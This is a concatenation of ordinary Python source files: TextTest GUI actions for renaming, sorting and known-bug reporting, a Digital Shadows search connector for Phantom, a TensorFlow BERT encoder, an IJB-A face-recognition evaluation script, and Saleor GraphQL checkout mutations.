return "You are trying to rename a definition file in such a way that it will no longer fulfil its previous purpose.\nTextTest uses conventional names for files with certain purposes and '" + oldStem + "' is one such conventional name.\nAre you sure you want to continue?"
elif self.oldName.endswith(".shortcut"):
if not newName.endswith(".shortcut"):
return "A shortcut file name should end with '.shortcut'\nYou are trying to rename it with another extension\nAre you sure you want to continue?"
elif self.oldName.count("$") != newName.count("$"):
return "The number of shortcut arguments seems to be different.\nAre you sure you want to continue?"
else:
return ""
def isDefinitionFileStem(self, stem):
if self.configAppList:
return stem == "config"
else:
return self.currTestSelection[0].isDefinitionFileStem(stem)
def performRename(self, newName):
oldPath = self.currFileSelection[0][0]
newPath = os.path.join(os.path.dirname(oldPath), newName)
self.checkNewName(newName, newPath)
self.movePath(oldPath, newPath)
if self.configAppList:
for app in self.configAppList:
app.refreshFiles()
self.notify("ReloadConfig")
else:
self.currTestSelection[0].filesChanged()
changeMessage = self.getNameChangeMessage(newName)
if self.oldName.endswith(".shortcut") and newName.endswith(".shortcut"):
from storytext.replayer import ReplayScript
self.notify("ShortcutRename", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(self.oldName)) + " renamed to " + ReplayScript.tryToGetName(newName))
self.oldName = newName
self.notify("Status", changeMessage)
class SortTestSuiteFileAscending(guiplugins.ActionGUI):
def singleTestOnly(self):
return True
def correctTestClass(self):
return "test-suite"
def isActiveOnCurrent(self, *args):
return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and not self.currTestSelection[0].autoSortOrder
def _getStockId(self):
return "sort-ascending"
def _getTitle(self):
return "_Sort Test Suite File"
def messageAfterPerform(self):
return "Sorted testsuite file for " + self.describeTests() + " in alphabetical order."
def getTooltip(self):
return "sort testsuite file for the selected test suite in alphabetical order"
def performOnCurrent(self):
self.performRecursively(self.currTestSelection[0], True)
def performRecursively(self, suite, ascending):
# First ask all sub-suites to sort themselves
if guiutils.guiConfig.getValue("sort_test_suites_recursively"):
for test in suite.testcases:
if test.classId() == "test-suite":
self.performRecursively(test, ascending)
self.notify("Status", "Sorting " + repr(suite))
self.notify("ActionProgress")
if self.hasNonDefaultTests():
self.showWarningDialog("\nThe test suite\n'" + suite.name + "'\ncontains tests which are not present in the default version.\nTests which are only present in some versions will not be\nmixed with tests in the default version, which might lead to\nthe suite not looking entirely sorted.")
suite.sortTests(ascending)
def hasNonDefaultTests(self):
if len(self.currTestSelection) == 1:
return False
for extraSuite in self.currTestSelection[1:]:
for test in extraSuite.testcases:
if not self.currTestSelection[0].findSubtest(test.name):
return True
return False
class SortTestSuiteFileDescending(SortTestSuiteFileAscending):
def _getStockId(self):
return "sort-descending"
def _getTitle(self):
return "_Reversed Sort Test Suite File"
def messageAfterPerform(self):
return "Sorted testsuite file for " + self.describeTests() + " in reversed alphabetical order."
def getTooltip(self):
return "sort testsuite file for the selected test suite in reversed alphabetical order"
def performOnCurrent(self):
self.performRecursively(self.currTestSelection[0], False)
class ReportBugs(guiplugins.ActionDialogGUI):
def __init__(self, allApps, *args):
guiplugins.ActionDialogGUI.__init__(self, allApps, *args)
self.textGroup = plugins.OptionGroup("Search for")
self.searchGroup = plugins.OptionGroup("Search in")
self.applyGroup = plugins.OptionGroup("Additional options to only apply to certain runs")
self.bugSystemGroup = plugins.OptionGroup("Link failure to a reported bug")
self.textDescGroup = plugins.OptionGroup("Link failure to a textual description")
self.textGroup.addOption("search_string", "Text or regexp to match", multilineEntry=True)
self.textGroup.addSwitch("use_regexp", "Enable regular expressions", 1)
self.textGroup.addSwitch("trigger_if", name="Trigger if", options=["Present", "NOT present", "Exactly as given"])
self.searchGroup.addSwitch("data_source", options = [ "Specific file", "Brief text/details", "Full difference report" ], description = [ "Search in a newly generated file (not its diff)", "Search in the brief text describing the test result as it appears in the Details column in the dynamic GUI test view", "Search in the whole difference report as it appears in the lower right window in the dynamic GUI" ])
self.searchGroup.addOption("search_file", "File to search in")
self.searchGroup.addSwitch("ignore_other_errors", "Trigger even if other files differ", description="By default, this bug is only enabled if only the provided file is different. Check this box to enable it irrespective of what other difference exist. Note this increases the chances of it being reported erroneously and should be used carefully.")
self.searchGroup.addSwitch("trigger_on_success", "Trigger even if file to search would otherwise compare as equal", description="By default, this bug is only enabled if a difference is detected in the provided file to search. Check this box to search for it even if the file compares as equal.")
self.applyGroup.addOption("version", "\nVersion to report for")
self.applyGroup.addOption("execution_hosts", "Trigger only when run on machine(s)")
self.bugSystemGroup.addOption("bug_system", "\nExtract info from bug system", "<none>", self.findBugSystems(allApps))
self.bugSystemGroup.addOption("bug_id", "Bug ID")
self.textDescGroup.addOption("full_description", "\nFull description")
self.textDescGroup.addOption("brief_description", "Few-word summary")
self.textDescGroup.addSwitch("internal_error", "Report as 'internal error' rather than 'known bug'")
self.optionGroup.addOption("rerun_count", "Number of times to try to rerun the test if the issue is triggered", 0)
def isModal(self):
return False # Want to be able to select text from the main GUI while we're in the dialog
def fillVBox(self, vbox, optionGroup):
if optionGroup is self.optionGroup:
for group in [ self.textGroup, self.searchGroup, self.applyGroup ]:
if group is self.applyGroup:
widget = self.createExpander(group)
else:
widget = self.createFrame(group, group.name)
vbox.pack_start(widget, fill=False, expand=False, padding=8)
vbox.pack_start(gtk.HSeparator(), padding=8)
header = gtk.Label()
header.set_markup("<u>Fill in exactly <i>one</i> of the sections below</u>\n")
vbox.pack_start(header, expand=False, fill=False, padding=8)
for group in [ self.bugSystemGroup, self.textDescGroup ]:
frame = self.createFrame(group, group.name)
vbox.pack_start(frame, fill=False, expand=False, padding=8)
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, optionGroup)
def createExpander(self, group):
expander = gtk.Expander(group.name)
expander.add(self.createGroupBox(group))
return expander
def createRadioButtons(self, *args):
buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args)
buttons[0].connect("toggled", self.dataSourceChanged)
return buttons
def dataSourceChanged(self, *args):
sensitive = not self.searchGroup.getOptionValue("data_source")
self.setGroupSensitivity(self.searchGroup, sensitive)
def findBugSystems(self, allApps):
bugSystems = []
for app in allApps:
for appSystem in app.getConfigValue("bug_system_location").keys():
if appSystem not in bugSystems:
bugSystems.append(appSystem)
return bugSystems
def _getStockId(self):
return "info"
def _getTitle(self):
return "Enter Failure Information"
def getDialogTitle(self):
return "Enter information for automatic interpretation of test failures"
def getDefaultSearchFile(self, possibleValues):
logFileStems = set([ test.getConfigValue("log_file") for test in self.currTestSelection ])
for logFileStem in logFileStems:
if logFileStem in possibleValues:
return logFileStem
return possibleValues[0]
def _cleanDialog(self, *args):
self.searchGroup.getOption("search_file").resetDefault()
guiplugins.ActionDialogGUI._cleanDialog(self, *args)
def updateOptions(self):
possibleValues = self.getPossibleFileStems()
if possibleValues:
self.searchGroup.setOptionValue("search_file", self.getDefaultSearchFile(possibleValues))
self.searchGroup.setPossibleValues("search_file", possibleValues)
return False
def getPossibleFileStems(self):
stems = []
for testOrSuite in self.currTestSelection:
excludeStems = testOrSuite.expandedDefFileStems()
for test in testOrSuite.testCaseList():
for stem in test.dircache.findAllStems():
if stem not in stems and stem not in excludeStems:
stems.append(stem)
return stems
def checkSanity(self):
searchStr = self.textGroup.getOptionValue("search_string")
if len(searchStr) == 0:
raise plugins.TextTestError, "Must fill in the field 'text or regexp to match'"
elif searchStr.startswith(" "):
raise plugins.TextTestError, "'Knownbugs' file format cannot handle leading spaces in search string.\n" + \
"If the line starts with spaces, suggest to add a ^ at the start, to match the beginning of the line"
if self.bugSystemGroup.getOptionValue("bug_system") == "<none>":
if len(self.textDescGroup.getOptionValue("full_description")) == 0 or \
len(self.textDescGroup.getOptionValue("brief_description")) == 0:
raise plugins.TextTestError, "Must either provide a bug system or fill in both description and summary fields"
else:
if len(self.bugSystemGroup.getOptionValue("bug_id")) == 0:
raise plugins.TextTestError, "Must provide a bug ID if bug system is given"
def versionSuffix(self):
version = self.applyGroup.getOptionValue("version")
if len(version) == 0:
return ""
else:
return "." + version
def getFiles(self, ancestors):
fileNames = []
for ancestor in ancestors:
name = "knownbugs." + ancestor.app.name + self.versionSuffix()
fileName = os.path.join(ancestor.getDirectory(), name)
if not any((fileName.startswith(f) for f in fileNames)):
fileNames.append(fileName)
return [ open(fileName, "a") for fileName in fileNames ]
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.6, 0.6
@classmethod
def updateAncestors(cls, ancestors, test):
for i, ancestor in enumerate(ancestors):
newAncestor = ancestor.findCommonAncestor(test)
if newAncestor:
ancestors[i] = newAncestor
return True
return False
@classmethod
def findCommonSelectedAncestors(cls, tests):
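        # Reduce the selected tests to a minimal set of suites: each test either merges into the first entry it shares a common ancestor with, or is added as a new entry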
ancestors = [ tests[0] ]
for test in tests[1:]:
if not cls.updateAncestors(ancestors, test):
ancestors.append(test)
return ancestors
def performOnCurrent(self):
self.checkSanity()
dataSourceText = { 1 : "brief_text", 2 : "free_text" }
triggerText = {1 : "trigger_on_absence", 2 : "trigger_on_identical"}
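        # These dictionaries map the radio-button indices to the keyword values written into the knownbugs file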
namesToIgnore = [ "version" ]
ancestors = self.findCommonSelectedAncestors(self.currTestSelection)
for writeFile in self.getFiles(ancestors):
writeFile.write("\n[Reported by " + os.getenv("USER", "Windows") + " at " + plugins.localtime() + "]\n")
for group in [ self.textGroup, self.searchGroup, self.applyGroup,
self.bugSystemGroup, self.textDescGroup, self.optionGroup ]:
for name, option in group.options.items():
value = option.getValue()
if name in namesToIgnore or self.hasDefaultValue(name, value):
continue
if name == "data_source":
writeFile.write("search_file:" + dataSourceText[value] + "\n")
namesToIgnore += [ "search_file", "trigger_on_success", "ignore_other_errors" ]
elif name == "trigger_if":
writeFile.write(triggerText[value] + ":" + "1\n")
else:
writeFile.write(name + ":" + str(value).replace("\n", "\\n") + "\n")
self.updateWithBugFile(writeFile, ancestors)
writeFile.close()
self.setFilesChanged(ancestors)
def hasDefaultValue(self, name, value):
if name == "use_regexp":
return value == 1
else:
return not value or value in [ "0", "<none>" ]
def updateWithBugFile(self, *args):
pass # only used in dynamic GUI
def setFilesChanged(self, ancestors):
for ancestor in ancestors:
ancestor.filesChanged()
def getInteractiveActionClasses():
return [ CopyTests, CutTests, PasteTests,
ImportTestCase, ImportTestSuite, ImportApplication, ImportFiles,
RenameTest, RenameFile, RemoveTests, RemoveTestsForPopup, RemoveFiles, ReportBugs,
SortTestSuiteFileAscending, SortTestSuiteFileDescending,
RepositionTestFirst, RepositionTestUp, RepositionTestDown, RepositionTestLast ]
|
# File: ds_search_entities_connector.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
import phantom.app as phantom
from phantom.action_result import ActionResult
from digital_shadows_consts import *
from dsapi.service.search_entities_service import SearchEntitiesService
from exception_handling_functions import ExceptionHandling
class DSSearchEntitiesConnector(object):
def __init__(self, connector):
"""
:param connector: DigitalShadowsConnector
"""
self._connector = connector
config = connector.get_config()
self._handle_exception_object = ExceptionHandling()
self._ds_api_key = config[DS_API_KEY_CFG]
self._ds_api_secret_key = config[DS_API_SECRET_KEY_CFG]
def search_entities(self, param):
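        # Query the Digital Shadows search API for the given query string and date range, and add each returned entity payload to the action result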
action_result = ActionResult(dict(param))
self._connector.add_action_result(action_result)
        self._connector.save_progress("Search entities process started")
# type = param.get('types').split(',')
type = ["CLIENT_INCIDENT", "DATA_BREACH", "AGGREGATE_DATA_BREACH", "INTELLIGENCE", "TECHNICAL_SOURCE", "WEB_SOURCE"]
date_range = param.get('date_range')
query = param.get('query')
"""
incident_types = param.get('incident_types')
incident_subtypes = param.get('incident_subtypes')
incident_severities = param.get('incident_severities')
web_page_networks = param.get('web_page_networks')
forum_post_networks = param.get('forum_post_networks')
marketplace_listing_networks = param.get('marketplace_listing_networks')
market_places = param.get('marketplaces')
chat_protocols = param.get('chat_protocols')
chat_servers = param.get('chat_servers')
chat_channels = param.get('chat_channels')
threat_level_types = param.get('threat_level_types')
web_page_site_categories = param.get('web_page_site_categories')
forum_post_site_categories = param.get('forum_post_site_categories')
blog_names = param.get('blog_names')
date_period = param.get('date_period')
start_date = param.get('from')
end_date = param.get('until')
"""
try:
search_service = SearchEntitiesService(self._ds_api_key, self._ds_api_secret_key)
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "{0} {1}".format(SERVICE_ERR_MSG, error_message))
try:
search_view = search_service.search_entity_view(dateRange=date_range, query_string=query, types=type)
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {0}".format(error_message))
"""
search_view = search_service.search_entity_view(types=type, dateRange=date_range, incidentTypes=incident_types, incidentSubtypes=incident_subtypes,
incidentSeverities=incident_severities, webPageNetworks=web_page_networks,
forumPostNetworks=forum_post_networks, marketplaceListingNetworks=marketplace_listing_networks,
marketplaces=market_places, chatProtocols=chat_protocols, chatServers=chat_servers,
chatChannels=chat_channels, threatLevelTypes=threat_level_types,
webPageSiteCategories=web_page_site_categories, forumPostSiteCategories=forum_post_site_categories,
blogNames=blog_names, datePeriod=date_period, from_date=start_date,
until=end_date, query_string=query)
"""
self._connector.save_progress("View: {}".format(search_view))
try:
search_entity_pages = search_service.find_all_pages(view=search_view)
# self._connector.save_progress("entity: " + str(search_entity_pages))
entity_total = len(search_entity_pages)
except StopIteration:
error_message = 'No Search Entity objects retrieved from the Digital Shadows API in page groups'
return action_result.set_status(phantom.APP_ERROR, "Error Details: {0}".format(error_message))
except Exception as e:
error_message = self._handle_exception_object.get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {}".format(error_message))
if entity_total > 0:
summary = {
'entity_count': entity_total,
'entity_found': True
}
action_result.update_summary(summary)
for entity_page in search_entity_pages:
for entity in entity_page:
# self._connector.save_progress("entity payload: " + str(entity.payload))
action_result.add_data(entity.payload)
            action_result.set_status(phantom.APP_SUCCESS, 'Search entities fetched successfully')
else:
summary = {
'entity_count': 0,
'entity_found': False
}
action_result.update_summary(summary)
            action_result.set_status(phantom.APP_SUCCESS, 'No entities found for the search string')
return action_result.get_status()
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib as tc
from . import encoder
from utils import util
def bert_encoder(sequence, params):
# extract sequence mask information
seq_mask = 1. - tf.to_float(tf.equal(sequence, params.bert.vocab.pad))
# extract segment information
seg_pos = tf.to_float(tf.equal(sequence, params.bert.vocab.sep))
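    # seg_ids[i] counts the [SEP] tokens strictly before position i, so the first segment (up to and including its [SEP]) gets id 0 and the next segment gets id 1; padding positions are zeroed via seq_mask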
seg_ids = tf.cumsum(seg_pos, axis=1, reverse=True)
seg_num = tf.reduce_sum(seg_pos, axis=1, keepdims=True)
seg_ids = seg_num - seg_ids
seg_ids = tf.to_int32(seg_ids * seq_mask)
# sequence length information
seq_shp = util.shape_list(sequence)
batch_size, seq_length = seq_shp[:2]
def custom_getter(getter, name, *args, **kwargs):
kwargs['trainable'] = params.tune_bert
return getter(name, *args, **kwargs)
with tf.variable_scope("bert", custom_getter=custom_getter):
        # handling sequence embeddings: token embedding plus segment embedding plus positional embedding
embed_initializer = tf.truncated_normal_initializer(stddev=params.bert.initializer_range)
with tf.variable_scope("embeddings"):
word_embedding = tf.get_variable(
name="word_embeddings",
shape=[params.bert.vocab.size, params.bert.hidden_size],
initializer=embed_initializer
)
seq_embed = tf.nn.embedding_lookup(word_embedding, sequence)
segment_embedding = tf.get_variable(
name="token_type_embeddings",
shape=[2, params.bert.hidden_size],
initializer=embed_initializer
)
seg_embed = tf.nn.embedding_lookup(segment_embedding, seg_ids)
# word embedding + segment embedding
seq_embed = seq_embed + seg_embed
# add position embedding
assert_op = tf.assert_less_equal(seq_length, params.bert.max_position_embeddings)
with tf.control_dependencies([assert_op]):
position_embedding = tf.get_variable(
name="position_embeddings",
shape=[params.bert.max_position_embeddings, params.bert.hidden_size],
initializer=embed_initializer
)
pos_embed = position_embedding[:seq_length]
seq_embed = seq_embed + tf.expand_dims(pos_embed, 0)
# post-processing, layer norm and segmentation
seq_embed = tc.layers.layer_norm(
inputs=seq_embed, begin_norm_axis=-1, begin_params_axis=-1)
seq_embed = util.valid_apply_dropout(seq_embed, params.bert.hidden_dropout_prob)
bert_outputs = []
# handling sequence encoding with transformer encoder
with tf.variable_scope("encoder"):
attention_mask = encoder.create_attention_mask_from_input_mask(
sequence, seq_mask)
# Run the stacked transformer.
# `sequence_output` shape = [batch_size, seq_length, hidden_size].
all_encoder_layers = encoder.transformer_model(
input_tensor=seq_embed,
attention_mask=attention_mask,
hidden_size=params.bert.hidden_size,
num_hidden_layers=params.bert.num_hidden_layers,
num_attention_heads=params.bert.num_attention_heads,
intermediate_size=params.bert.intermediate_size,
intermediate_act_fn=encoder.get_activation(params.bert.hidden_act),
hidden_dropout_prob=params.bert.hidden_dropout_prob,
attention_probs_dropout_prob=params.bert.attention_probs_dropout_prob,
initializer_range=params.bert.initializer_range,
do_return_all_layers=True)
sequence_output = all_encoder_layers
bert_outputs.append(sequence_output)
if params.use_bert_single:
# The "pooler" converts the encoded sequence tensor of shape
# [batch_size, seq_length, hidden_size] to a tensor of shape
# [batch_size, hidden_size]. This is necessary for segment-level
# (or segment-pair-level) classification tasks where we need a fixed
# dimensional representation of the segment.
with tf.variable_scope("pooler"):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token. We assume that this has been pre-trained
first_token_tensor = tf.squeeze(sequence_output[-1][:, 0:1, :], axis=1)
pooled_output = tf.layers.dense(
first_token_tensor,
params.bert.hidden_size,
activation=tf.tanh,
kernel_initializer=embed_initializer)
bert_outputs.append(pooled_output)
return bert_outputs
def bert_feature(layer_features, scope=None):
with tf.variable_scope(scope or "fuse_bert_seq_feature"):
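        # Learn one scalar logit per encoder layer and return the softmax-weighted sum of the layer features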
layer_features = [tf.expand_dims(feature, 0) for feature in layer_features]
layer_features = tf.concat(layer_features, 0)
layer_logits = tf.layers.dense(layer_features, 1)
layer_weights = tf.nn.softmax(layer_logits, 0)
layer_feature = tf.reduce_sum(layer_weights * layer_features, 0)
return layer_feature
|
import os, sys, shutil
import struct as st
import numpy as np
from scipy import spatial
from sklearn import metrics
from scipy.optimize import fsolve
from scipy.interpolate import interp1d
from sklearn.metrics.pairwise import cosine_similarity
def load_meta_data(meta_file, sub_dir):
meta_data = dict()
with open(meta_file, 'r') as in_f:
in_f.readline() # the first line is not data
for idx, line in enumerate(in_f):
record = line.strip().split(',')
template, class_id = int(record[0]), int(record[1])
img_path = '{}/{}.jpg'.format(sub_dir,idx+1)
if template not in meta_data:
meta_data[template] = ( class_id, [img_path,] )
else:
meta_data[template][1].append(img_path)
return meta_data
def load_feat(list_file, bin_file):
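    # The binary file starts with two int32 values (feature count and dimension), followed by float32 feature vectors in the same order as the image list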
mid_feats = dict()
with open(list_file, 'r') as list_f, open(bin_file, 'rb') as bin_f:
(data_num, feat_dim) = st.unpack('ii', bin_f.read(8))
for line in list_f:
record = line.strip().split('/')
img_name = '/'.join(record[-2:])
feat = np.array(st.unpack('f'*feat_dim, bin_f.read(4*feat_dim)))
mid_feats[img_name] = feat
return mid_feats, feat_dim
def update_meta_data(meta_data, feats, feat_dim):
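    # Average the per-image features of each template into a single template-level feature; templates with no available features are dropped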
new_meta_data = dict()
for template in meta_data.keys():
class_id, img_names = meta_data[template]
feat = np.zeros(feat_dim)
feat_num = 0
for img_name in img_names:
if img_name in feats:
feat += feats[img_name]
feat_num += 1
#else:
#print(img_name)
        if feat_num > 0:
            feat /= feat_num
            new_meta_data[template] = (class_id, feat)
return new_meta_data
def get_top(probe, gallery_data):
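    # Rank gallery templates by cosine similarity to the probe feature and return the class ids of the top five matches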
score_info = list()
probe_id, probe_feat = probe
for template in gallery_data.keys():
gallery_id, gallery_feat = gallery_data[template]
score = 1-spatial.distance.cosine(probe_feat, gallery_feat)
score_info.append((gallery_id, score))
score_info = sorted(score_info, key=lambda a:a[1], reverse=True)
top5_id = [item[0] for item in score_info[:5]]
return top5_id
def eval_recog(probe_data, gallery_data):
gallery_ids = set()
for template in gallery_data.keys():
gallery_ids.add(gallery_data[template][0])
top1_num, top5_num, tot_num = 0, 0, 0
for template in probe_data.keys():
class_id = probe_data[template][0]
if class_id not in gallery_ids: continue
top5_id = get_top(probe_data[template], gallery_data)
if class_id==top5_id[0]:
top1_num += 1
top5_num += 1
elif class_id in top5_id:
top5_num += 1
tot_num += 1
    return top1_num / float(tot_num), top5_num / float(tot_num)  # explicit float division so the accuracies are also correct under Python 2
def test_recog(model_type):
#model_type = 'resnet18'
protocol_dir = '../../data/IJBA/protocol_1N'
align_img_dir = '../../data/IJBA/align_image_1N'
split_num = 10
top1s, top5s = list(), list()
for split in range(1, split_num+1):
# load meta data first
split_protocol_dir = os.path.join(protocol_dir, 'split{}'.format(split))
#split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split))
probe_file = os.path.join(split_protocol_dir, 'search_probe_{}.csv'.format(split))
probe_data = load_meta_data(probe_file, 'probe')
gallery_file = os.path.join(split_protocol_dir, 'search_gallery_{}.csv'.format(split))
gallery_data = load_meta_data(gallery_file, 'gallery')
# load extract feat
feats = dict()
feat_dim = 0
split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split))
for img_type in ['gallery', 'probe']:
list_file = os.path.join(split_img_dir, '{}_list.txt'.format(img_type))
bin_file = os.path.join(split_img_dir, '{}_{}_feat.bin'.format(model_type, img_type))
mid_feats, feat_dim = load_feat(list_file, bin_file)
feats.update(mid_feats)
# update meta data
probe_data = update_meta_data(probe_data, feats, feat_dim)
gallery_data = update_meta_data(gallery_data, feats, feat_dim)
top1, top5 = eval_recog(probe_data, gallery_data)
top1s.append(top1)
top5s.append(top5)
print('split {}, top1: {}, top5: {}'.format(split,top1,top5))
print('top1: {} +/- {}'.format(np.mean(top1s), np.std(top1s)))
print('top5: {} +/- {}'.format(np.mean(top5s), np.std(top5s)))
return np.mean(top1s), np.std(top1s), np.mean(top5s), np.std(top5s)
if __name__ == '__main__':
test_recog(model_type='resnet50')
|
import graphene
from django.db import transaction
from ...checkout import models
from ...checkout.utils import (
add_variant_to_cart, change_billing_address_in_cart,
change_shipping_address_in_cart, create_order, get_taxes_for_cart,
ready_to_place_order)
from ...core import analytics
from ...core.exceptions import InsufficientStock
from ...core.utils.taxes import get_taxes_for_address
from ...payment import PaymentError
from ...payment.utils import gateway_authorize, gateway_capture, gateway_void
from ...shipping.models import ShippingMethod as ShippingMethodModel
from ..account.i18n import I18nMixin
from ..account.types import AddressInput, User
from ..core.mutations import BaseMutation, ModelMutation
from ..core.types.common import Error
from ..order.types import Order
from ..product.types import ProductVariant
from ..shipping.types import ShippingMethod
from .types import Checkout, CheckoutLine
def clean_shipping_method(
checkout, method, errors, discounts, taxes, country_code=None,
remove=True):
# FIXME Add tests for this function
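    # Validate the chosen shipping method against this checkout: shipping must be required, a shipping address must be set, and the method must be applicable for the address country, subtotal price and total weight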
if not method:
return errors
if not checkout.is_shipping_required():
errors.append(
Error(
field='checkout',
                message='This checkout does not require shipping.'))
if not checkout.shipping_address:
errors.append(
Error(
field='checkout',
message=(
'Cannot choose a shipping method for a '
'checkout without the shipping address.')))
return errors
valid_methods = (
ShippingMethodModel.objects.applicable_shipping_methods(
price=checkout.get_subtotal(discounts, taxes).gross.amount,
weight=checkout.get_total_weight(),
country_code=country_code or checkout.shipping_address.country.code
))
valid_methods = valid_methods.values_list('id', flat=True)
if method.pk not in valid_methods and not remove:
errors.append(
Error(
field='shippingMethod',
message='Shipping method cannot be used with this checkout.'))
if remove:
checkout.shipping_method = None
checkout.save(update_fields=['shipping_method'])
return errors
def check_lines_quantity(variants, quantities):
"""Check if stock is sufficient for each line in the list of dicts.
Return list of errors.
"""
errors = []
for variant, quantity in zip(variants, quantities):
try:
variant.check_quantity(quantity)
except InsufficientStock as e:
message = (
'Could not add item '
+ '%(item_name)s. Only %(remaining)d remaining in stock.' % {
'remaining': e.item.quantity_available,
'item_name': e.item.display_product()})
errors.append(('quantity', message))
return errors
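# Usage sketch: the (field, message) tuples returned above are consumed by the
# mutations below, e.g. in CheckoutCreate.clean_input:
#
#     line_errors = check_lines_quantity(variants, quantities)
#     for err in line_errors:
#         cls.add_error(errors, field=err[0], message=err[1])
#
# so an insufficient-stock line surfaces as a 'quantity' error on the mutation.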
class CheckoutLineInput(graphene.InputObjectType):
quantity = graphene.Int(
description='The number of items purchased.')
variant_id = graphene.ID(description='ID of the ProductVariant.')
class CheckoutCreateInput(graphene.InputObjectType):
lines = graphene.List(
CheckoutLineInput,
description=(
'A list of checkout lines, each containing information about '
'an item in the checkout.'))
email = graphene.String(description='The customer\'s email address.')
shipping_address = AddressInput(
description=(
            'The mailing address to which the checkout will be shipped.'))
class CheckoutCreate(ModelMutation, I18nMixin):
class Arguments:
input = CheckoutCreateInput(
required=True, description='Fields required to create a Checkout.')
class Meta:
description = 'Create a new Checkout.'
model = models.Cart
return_field_name = 'checkout'
@classmethod
def clean_input(cls, info, instance, input, errors):
cleaned_input = super().clean_input(info, instance, input, errors)
lines = input.pop('lines', None)
if lines:
variant_ids = [line.get('variant_id') for line in lines]
variants = cls.get_nodes_or_error(
ids=variant_ids, errors=errors, field='variant_id',
only_type=ProductVariant)
quantities = [line.get('quantity') for line in lines]
line_errors = check_lines_quantity(variants, quantities)
if line_errors:
for err in line_errors:
cls.add_error(errors, field=err[0], message=err[1])
else:
cleaned_input['variants'] = variants
cleaned_input['quantities'] = quantities
shipping_address_data = input.pop('shipping_address', None)
if shipping_address_data:
shipping_address, errors = cls.validate_address(
shipping_address_data, errors)
cleaned_input['shipping_address'] = shipping_address
return cleaned_input
@classmethod
def save(cls, info, instance, cleaned_input):
shipping_address = cleaned_input.get('shipping_address')
if shipping_address:
shipping_address.save()
instance.shipping_address = shipping_address
super().save(info, instance, cleaned_input)
instance.save(update_fields=['shipping_address'])
variants = cleaned_input.get('variants')
quantities = cleaned_input.get('quantities')
if variants and quantities:
for variant, quantity in zip(variants, quantities):
add_variant_to_cart(instance, variant, quantity)
class CheckoutLinesAdd(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated Checkout.')
class Arguments:
checkout_id = graphene.ID(
description='The ID of the Checkout.', required=True)
lines = graphene.List(
CheckoutLineInput,
required=True,
description=(
'A list of checkout lines, each containing information about '
'an item in the checkout.'))
class Meta:
        description = 'Adds checkout lines to the existing checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, lines, replace=False):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
variants, quantities = None, None
if checkout is not None:
if lines:
variant_ids = [line.get('variant_id') for line in lines]
variants = cls.get_nodes_or_error(
ids=variant_ids, errors=errors, field='variant_id',
only_type=ProductVariant)
quantities = [line.get('quantity') for line in lines]
line_errors = check_lines_quantity(variants, quantities)
if line_errors:
for err in line_errors:
cls.add_error(errors, field=err[0], message=err[1])
# FIXME test if below function is called
clean_shipping_method(
checkout=checkout, method=checkout.shipping_method,
errors=errors, discounts=info.context.discounts,
taxes=get_taxes_for_address(checkout.shipping_address))
if errors:
return CheckoutLinesAdd(errors=errors)
if variants and quantities:
for variant, quantity in zip(variants, quantities):
add_variant_to_cart(
checkout, variant, quantity, replace=replace)
return CheckoutLinesAdd(checkout=checkout, errors=errors)
class CheckoutLinesUpdate(CheckoutLinesAdd):
checkout = graphene.Field(Checkout, description='An updated Checkout.')
class Meta:
description = 'Updates CheckoutLine in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, lines):
return super().mutate(root, info, checkout_id, lines, replace=True)
class CheckoutLineDelete(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout.')
class Arguments:
checkout_id = graphene.ID(
description='The ID of the Checkout.', required=True)
line_id = graphene.ID(
description='ID of the CheckoutLine to delete.')
class Meta:
description = 'Deletes a CheckoutLine.'
@classmethod
def mutate(cls, root, info, checkout_id, line_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
line = cls.get_node_or_error(
info, line_id, errors, 'line_id', only_type=CheckoutLine)
if line and line in checkout.lines.all():
line.delete()
# FIXME test if below function is called
clean_shipping_method(
checkout=checkout, method=checkout.shipping_method, errors=errors,
discounts=info.context.discounts,
taxes=get_taxes_for_address(checkout.shipping_address))
if errors:
return CheckoutLineDelete(errors=errors)
return CheckoutLineDelete(checkout=checkout, errors=errors)
class CheckoutCustomerAttach(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout.')
class Arguments:
checkout_id = graphene.ID(
required=True, description='ID of the Checkout.')
customer_id = graphene.ID(
required=True, description='The ID of the customer.')
class Meta:
description = 'Sets the customer as the owner of the Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, customer_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
customer = cls.get_node_or_error(
info, customer_id, errors, 'customer_id', only_type=User)
if checkout is not None and customer:
checkout.user = customer
checkout.save(update_fields=['user'])
return CheckoutCustomerAttach(checkout=checkout, errors=errors)
class CheckoutCustomerDetach(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID', required=True)
class Meta:
description = 'Removes the user assigned as the owner of the checkout.'
@classmethod
def mutate(cls, root, info, checkout_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None and not checkout.user:
cls.add_error(
errors, field=None,
message='There\'s no customer assigned to this Checkout.')
if errors:
return CheckoutCustomerDetach(errors=errors)
checkout.user = None
checkout.save(update_fields=['user'])
return CheckoutCustomerDetach(checkout=checkout)
